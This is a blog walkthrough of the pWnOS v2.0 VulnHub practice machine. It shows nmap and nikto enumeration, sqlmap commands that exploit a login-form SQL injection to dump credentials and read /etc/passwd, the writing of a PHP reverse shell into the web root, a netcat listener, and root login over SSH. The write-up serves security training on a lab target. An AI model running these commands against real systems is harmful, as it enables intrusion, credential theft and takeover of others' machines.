pWnOS v2.0: VulnHub Walkthrough

Leave a Comment / June 23, 2020
Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Hello Everyone, In this blog I am going to post walkthrough of pWnOS v2.0.

It is a machine which will enhance your penetration testing skills.

You can download the machine from this link: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

Let’s Start,

Configure your attacking platform to be within the 10.10.10.0/24 network range

Target IP- 10.10.10.100

Attacker IP- 10.10.10.101

Let’s start with nmap

nmap -A 10.10.10.100

As we have found a web application running on TCP port 80, we can just do some further enumeration using a browser :

Now, I did nikto to check any login pages

I tried the /includes directory

On trying the login page It was seen that it was vulnerable to sql injection so we could use sqlmap for the same

It is showing logging..

We will take all the parameters it has submitted with the help of burpsuite for the sqlmap

sqlmap -u http://10.10.10.100/login.php –data=”email=test%40test.hu&pass=test&submit=Login&submitted=TRUE”

It shows email might be injectable

So we try to dump the results

sqlmap -u http://10.10.10.100/login.php –data=”email=test%40test.hu&pass=test&submit=Login&submitted=TRUE” –dump

We got the hash but it was of no use

Next I tried the users and passwords

sqlmap -u http://10.10.10.100/login.php –data=”email=test%40test.hu&pass=test&submit=Login&submitted=TRUE” –users –passwords

We got password but again of no use

Then I tried to read the file passwords

sqlmap -u http://10.10.10.100/login.php –data=”email=test%40test.hu&pass=test&submit=Login&submitted=TRUE” –file-read /etc/passwd

It shows the the output is in the root itself i.e /root

So I tried to get the limited shell using this path itself

sqlmap -u http://10.10.10.100/login.php –data=”email=test%40test.hu&pass=test&submit=Login&submitted=TRUE” –file-write /root/php-reverse-shell.php –file-dest /var/www/includes/reverseshell.php

On trying this and making on the listener I got the limited shell

nc -nlvp 1234

It shows that we have got the user access

Now on going inside the var file and www we found some files and the mysqli_connect.php file gave us the passwords

But none of them worked so I moved to var back and then again checked the mysqli_connect.php file and bingo we got the correct password

Then using ssh and entering the correct password

ssh root@10.10.10.100

We got the root access!!

Writer: Shubhankar is Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Leave a Comment

Your email address will not be published.

Scroll to Top